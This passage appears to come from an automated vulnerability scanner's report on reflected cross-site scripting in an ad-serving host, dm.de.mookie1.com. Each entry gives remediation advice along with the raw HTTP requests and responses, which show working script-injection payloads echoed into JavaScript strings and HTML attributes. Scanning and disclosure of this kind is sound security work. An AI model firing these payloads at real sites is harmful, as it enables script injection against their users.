http://dm.de.mookie1.com
Path:
/2/B3DM/2010DM/11452529046@x23
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 2009a"-alert(1)-"48bddd10057 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:46 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2486 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_300&2009a"-alert(1)-"48bddd10057=1";
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload bdb7f"><script>alert(1)</script>e7d57906e4a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:46 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload a9d3c"><script>alert(1)</script>11d0b336fd9 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:13 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload d02f1"><script>alert(1)</script>ede31db6dca was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:20 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 326 Content-Type: text/html
The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 495ac"-alert(1)-"d325f4e03a6 was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:44 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2483 Content-Type: text/html
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_300495ac"-alert(1)-"d325f4e03a6";
4.313. http://dm.de.mookie1.com/2/B3DM/2010DM/11542712710@x23 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dm.de.mookie1.com
Path:
/2/B3DM/2010DM/11542712710@x23
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 55739"-alert(1)-"ce4a27e97fe was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:44 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2486 Content-Type: text/html
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_300&55739"-alert(1)-"ce4a27e97fe=1";
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c4a53"><script>alert(1)</script>840ef40ea8a was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:44 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2145525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 64f21"><script>alert(1)</script>bbec3aa3a93 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:49 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2345525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload b10ef"><script>alert(1)</script>b222cfdaba7 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:16 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 326 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2245525d5f4f58455e445a4a423660;path=/
The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 9c13b"-alert(1)-"885857494a0 was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:39 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2483 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3945525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_3009c13b"-alert(1)-"885857494a0";
4.318. http://dm.de.mookie1.com/2/B3DM/2010DM/11687741401@x23 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dm.de.mookie1.com
Path:
/2/B3DM/2010DM/11687741401@x23
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload b8ab5"-alert(1)-"7b522b29148 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:43 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2486 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2645525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_300&b8ab5"-alert(1)-"7b522b29148=1";
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 770f6"><script>alert(1)</script>7298dce66c was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:41 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 332 Content-Type: text/html
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload e4c10"><script>alert(1)</script>d8743e92489 was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:46 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload ce5e6"><script>alert(1)</script>7b9a5b33a77 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:13 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 326 Content-Type: text/html
The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 734aa"-alert(1)-"2615324c30b was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_728 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:39 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2483 Content-Type: text/html
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_728734aa"-alert(1)-"2615324c30b";
4.323. http://dm.de.mookie1.com/2/B3DM/2010DM/1169827066@x23 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dm.de.mookie1.com
Path:
/2/B3DM/2010DM/1169827066@x23
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload d43f2"-alert(1)-"d90c9fa87b4 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:40 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2486 Content-Type: text/html
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_728&d43f2"-alert(1)-"d90c9fa87b4=1";
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c2b9a"><script>alert(1)</script>00e60963e9e was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DMc2b9a"><script>alert(1)</script>00e60963e9e/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:41:50 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e6f45525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload c1236"><script>alert(1)</script>bb4a83ff16b was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DMc1236"><script>alert(1)</script>bb4a83ff16b/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:41:59 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 333 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2445525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 63148"><script>alert(1)</script>79a363b6f58 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Request
GET /2/B3DM/2010DM/11711169344@x2363148"><script>alert(1)</script>79a363b6f58?USNetwork/RS_SELL_2011Q1_TF_CT_728 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:42:09 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 326 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3545525d5f4f58455e445a4a423660;path=/
The value of the USNetwork/RS_SELL_2011Q1_TF_CT_728 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 30a32"-alert(1)-"68d1cedd6ec was submitted in the USNetwork/RS_SELL_2011Q1_TF_CT_728 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2/B3DM/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_72830a32"-alert(1)-"68d1cedd6ec HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:41:41 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2481 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2045525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_TF_CT_72830a32"-alert(1)-"68d1cedd6ec";
4.328. http://dm.de.mookie1.com/2/B3DM/2010DM/11711169344@x23 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dm.de.mookie1.com
Path:
/2/B3DM/2010DM/11711169344@x23
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 5cea2"-alert(1)-"68fd8c2db03 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
Request
GET /2/B3DM/2010DM/11711169344@x23?USNetwork/RS_SELL_2011Q1_TF_CT_728&5cea2"-alert(1)-"68fd8c2db03=1 HTTP/1.1 Host: dm.de.mookie1.com Proxy-Connection: keep-alive Referer: http://a.tribalfusion.com/p.media/aumN7E0UYDTmaq5Pr9PAMD3Wnt1dJZcpdiO4A3R3sr8Tcv9WsMgRAMNUdQSWbMX2UarUEMvVEUjPavJQcYLQrupRdv9UVY54bymodiOXqPm3tbCSVfZa46QJmdAmTdf6XUfcYbUe1qioSFQZbWF33VHvTnFBsQUfN1HYHxdcQKv/2401306/adTag.html Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.10 (KHTML, like Gecko) Chrome/8.0.552.237 Safari/534.10 Accept-Encoding: gzip,deflate,sdch Accept-Language: en-US,en;q=0.8 Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3 Cookie: OAX=rcHW800iZiMAAocf; id=914803576615380; dlx_7d=set; RMFL=011Pi745U102Og|U106t6; NXCLICK2=011Pi748NX_TRACK_Abc_Acct/Retarget_TheMiddle_Nonsecure!y!B3!2PB!3U2; RMFM=011Pi748U102PB|S106w2|U10C7a|U10CEj
Response
HTTP/1.1 200 OK Date: Fri, 28 Jan 2011 16:41:46 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2484 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e3645525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_TF_CT_728&5cea2"-alert(1)-"68fd8c2db03=1";
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 425ff"><script>alert(1)</script>83713a5700b was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:51 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 3 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 4fbb4"><script>alert(1)</script>e91f36c3ebf was submitted in the REST URL parameter 3. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:17 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 334 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2445525d5f4f58455e445a4a423660;path=/
The value of REST URL parameter 4 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 33292"><script>alert(1)</script>790b6dea070 was submitted in the REST URL parameter 4. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:01:25 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 326 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2445525d5f4f58455e445a4a423660;path=/
The value of the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 8204f"-alert(1)-"98ce25bd14a was submitted in the USNetwork/RS_SELL_2011Q1_AOL_CPA_300 parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:46 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2483 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_3008204f"-alert(1)-"98ce25bd14a";
4.333. http://dm.de.mookie1.com/2/B3DM/2010DM/117382567@x23 [name of an arbitrarily supplied request parameter]previousnext
Summary
Severity:
High
Confidence:
Certain
Host:
http://dm.de.mookie1.com
Path:
/2/B3DM/2010DM/117382567@x23
Issue detail
The name of an arbitrarily supplied request parameter is copied into a JavaScript string which is encapsulated in double quotation marks. The payload 1dd20"-alert(1)-"8bbf31670d1 was submitted in the name of an arbitrarily supplied request parameter. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
Remediation detail
Echoing user-controllable data within a script context is inherently dangerous and can make XSS attacks difficult to prevent. If at all possible, the application should avoid echoing user data within this context.
HTTP/1.1 200 OK Date: Sat, 29 Jan 2011 02:00:49 GMT Server: Apache/2.0.52 (Red Hat) P3P: CP="NON NID PSAa PSDa OUR IND UNI COM NAV STA",policyref="/w3c/p3p.xml" Content-Length: 2486 Content-Type: text/html Set-Cookie: NSC_en.ef.efm_qppm_iuuq=ffffffff09499e2745525d5f4f58455e445a4a423660;path=/
<html> <head></head> <body> <script> function cookie_check(ifd,ife){ var s=ife.indexOf(ifd); if(s==-1)return ""; s+=ifd.length; var e=ife.indexOf(";",s); if(e==-1)e=ife.length; return ife.substring(s,e); } var camp="USNetwork/RS_SELL_2011Q1_AOL_CPA_300&1dd20"-alert(1)-"8bbf31670d1=1";
The value of REST URL parameter 2 is copied into the value of an HTML tag attribute which is encapsulated in double quotation marks. The payload 38d72"><script>alert(1)</script>d7977f5f4c4 was submitted in the REST URL parameter 2. This input was echoed unmodified in the application's response.
This proof-of-concept attack demonstrates that it is possible to inject arbitrary JavaScript into the application's response.
